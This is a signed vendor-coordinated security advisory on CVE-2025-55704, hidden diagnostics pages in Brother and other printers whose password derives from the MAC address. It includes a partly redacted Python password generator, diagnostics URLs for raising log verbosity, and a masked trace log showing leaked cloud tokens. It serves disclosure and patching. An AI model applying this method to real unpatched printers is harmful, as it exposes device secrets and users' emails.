-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2025-008 Product: Multiple products are affected (see [1], [2], [3]) Manufacturer: Brother Industries, Ltd., Konica Minolta, Inc., Ricoh Company, Ltd. Affected Version(s): Versions depend on the vulnerable product and vendor (see [1], [2], [3]) Tested Version(s): 1.17 of the Brother HL-L2400DW Printer Vulnerability Type: Hidden Functionality (CWE-912) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2025-02-13 Solution Date: 2026-01-29 Public Disclosure: 2026-01-29 CVE Reference: CVE-2025-55704 Author of Advisory: Jan Wütherich, Albstadt-Sigmaringen University ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Brother HL-L2400DW Printer is a laser printer with networking capabilities. The manufacturer describes the product as follows (see [4]): "The HL-L2400DW is designed to increase efficiency, with fast print speeds helping you to work smarter. The 2-sided print feature saves you time, enabling you to get on with other tasks. Make your day easier and your printing effortless, with simple set up and 5GHz WiFi or USB connection. This efficient HL-2400DW is a breeze to operate using the easy to navigate control panel." Insufficient protection of diagnostics pages can allow an attacker to gain access to the device logs. Furthermore, the log level can be modified, resulting in the logging of sensitive data, such as device tokens. This, in turn, can lead to the exposure of sensitive information to unauthorized users on the network. While SySS verified the vulnerability for the Brother HL-L2400DW Printer with firmware version 1.17, multiple devices from multiple manufacturers are affected by the same issue (see [1], [2], [3]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: By analyzing the firmware of the device, several hidden diagnostics pages of the web interface were discovered. The diagnostics pages are protected using HTTP digest access authentication. The username is hardcoded to the value "diaguser" and the password is derived from the device's MAC address. For this, the MAC address is scrambled using a hardcoded pattern and is then hashed using SHA256. The resulting hash is converted to hexadecimal values with alternating uppercase and lowercase letters, resulting in the final password. Thus, an attacker can figure out the password, simply by knowing the MAC address of the device. This allows retrieving a trace_log.txt with several device logs. One part of the diagnostics pages is the settings page, which allows modifying various logging options using URL parameters. By changing the log level to a higher verbosity, sensitive device secrets can be obtained from the trace log when the device retrieves them. Using these secrets, the attacker can retrieve e-mails sent to the printer from the Brother online services. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following tool was developed to generate the diagnostics password using the MAC address as input. The scramble indices and format string characters have been replaced with an 'X'. #!/usr/bin/env python3 from hashlib import sha256 import sys MAC = [int(x, 16) for x in sys.argv[1].split(":")] SCRAMBLE = [ [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ], [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ], [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ], [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ], [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ], [ 0xXX, 0xXX, 0xXX, 0xXX, 0xXX, 0xXX ] ] if __name__ == "__main__": index = MAC[5] % 6 text = f"XXX{MAC[SCRAMBLE[index][0]]:02X}" text += f"XXX{MAC[SCRAMBLE[index][1]]:02X}" text += f"XX{MAC[SCRAMBLE[index][2]]:02X}" text += f"XX{MAC[SCRAMBLE[index][3]]:02X}" text += f"XX{MAC[SCRAMBLE[index][4]]:02X}" text += f"XX{MAC[SCRAMBLE[index][5]]:02X}XX" thash = sha256(text.encode("ascii")) print("[i] Diagnostics password: ", end="") for i, b in enumerate(thash.digest()): if (i & 1) == 0: print(f"{b:02x}", end="") else: print(f"{b:02X}", end="") print() The following output then demonstrates retrieving the password with a documentation MAC address. A real MAC address could be retrieved from the ARP cache. $ python diagnostics_password.py 00:00:5E:00:53:00 [i] Diagnostics password: 203E1c9671C26bE5b4159d0B037B2cA3d0944058976240F8390DeaA1fa657e48 This then allows logging in to the diagnostics pages, where the log verbosity can be changed with the following URL: https://10.10.0.10/diagnostics/boc/setting?filter_level=N&log_size_limit=65536. The trace log can now be monitored using the following URL: https://10.10.0.10/diagnostics/boc/trace_log.txt. If a user now sets up the Brother online services using the web interface, a device access token, access token secret, consumer key, and consumer key secret will be logged to the trace_log. These secrets can then be used to listen to messages sent from the Brother online services to the printer. < 1130> [mysora_Utility.c:331] N: success: true < 1130> [mysora_Utility.c:378] N: code: 200 < 1130> [mysora_Utility.c:437] N: message: Success < 1130> [mysora_Utility.c:437] N: access_token: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX < 1130> [mysora_Utility.c:437] N: access_token_secret: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX < 1130> [mysora_Utility.c:437] N: consumer_key: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX < 1130> [mysora_Utility.c:437] N: consumer_secret: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX < 1130> [mysora_Utility.c:437] N: device_id: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Update to the latest firmware version of the affected device (see [1], [2], [3]). ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2025-01-09: Vulnerability discovered 2025-02-13: Vulnerability reported to manufacturer 2026-01-29: Patch released by manufacturer 2026-01-29: Public disclosure of vulnerability by manufacturer 2026-02-02: Public disclosure of vulnerability by SySS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Affected Brother Industries, Ltd. devices https://faq.brother.co.jp/app/answers/detail/a_id/13716 https://faq.brother.co.jp/euf/assets/pdf/13716%E2%80%9720260128.pdf [2] Affected Konica Minolta, Inc. devices https://www.konicaminolta.com/global-en/security/advisory/pdf/km-2026-0001.pdf [3] Affected Ricoh Company, Ltd. devices https://www.ricoh.com/products/security/vulnerabilities/vul?id=ricoh-2026-000001 [4] Datasheet for HL-L2400DW https://www.brother.eu/-/media/Product-Downloads/Devices/Printers/HL/HLL2400DW/HL-L2400DW---Datasheet.ashx [5] SySS Security Advisory SYSS-2025-008 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-008.txt [6] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was discovered by students of the Albstadt-Sigmaringen University in cooperation with SySS GmbH. Jan Wütherich - jan[at]wuetherich[dot]de, wuetheja@hs-albsig.de Manuel Schuttenberg - manuel[at]schuttenberg[dot]net, schuttma@hs-albsig.de Simon Häupler - haeuplsi@hs-albsig.de Marvin Härter - haertema@hs-albsig.de Silas Feuerherdt - feuerhsi@hs-albsig.de Timm Ditz - ditztimm@hs-albsig.de Saeed Brezek - brezeksa@hs-albsig.de Supervised by: Simon Malik - maliks@hs-albsig.de Prof. Holger Morgenstern - morgenstern@hs-albsig.de Contact SySS GmbH: E-Mail: anton.fabricius@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Anton_Fabricius.asc Key ID: 0xB2ED52BF0DEAC709 Key Fingerprint: 3476 F352 EBC1 F702 5048 B573 B2ED 52BF 0DEA C709 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 4.0 URL: https://creativecommons.org/licenses/by/4.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEENHbzUuvB9wJQSLVzsu1Svw3qxwkFAmmAnLQACgkQsu1Svw3q xwkAjg/8CaFQ0Y13v8pMRVSo2XGnq5RHsvD5+6nJf5PVVo8znE+h11r4cwkBzPIV flFMNzX82rdqL3RFiPEzr376Q9BBXmHsSb6ktFkbdUBwWp90rH1a+T+tqHaCi2ab J0+w/seLFifCUnLnQmgDsald9LryUL4o9TUbWRfSibNOvLKtLA1H+UqOH5k0egKJ 3m4p3Ouv/oeyufwpzcerCIgAqm9ELEDdm6Vp+QflYikOscVY3U9ErQayd/STx0ad gQ6As7LSfgx9u4EgfvapeW9DB0dw85hM7mJFgggNMKnrcOvHZuKATtvDGFqagE0q b6Ze2q9wlF0ifsqypHS1IJLxSlEzO4ohGHAxIsH5MBwpConZuW0hSbCc3J08RazF mvtqzIYco+TcIPmHoOxmMIf/C5gBsJSIVhBFt9ckp2D6BZomALpbFHwAKIFy7Fbf Gw5FDbjEFV3j6Ipw6tFu9zHh4JOR7yE4bIz9RN3cwHTbopiEtYxzBCPi0UjBdTLY Ty1ppK+TlNvURaGOoVvLLX1J42bYuKqHMlBcbZj18Q5MRLEw4ozazWBvYaBENyz+ Bn8WIfRBDlnlsx3eMyTtUG/ZwCOS5+AqETZQRwnpsjW8tLy/6PzuUY2FaOlComUb rFJCG96bvAKCLEpL7L5rwQ2TKdvM2bif8FGQnVNBpXmUYafASrk= =jt/t -----END PGP SIGNATURE-----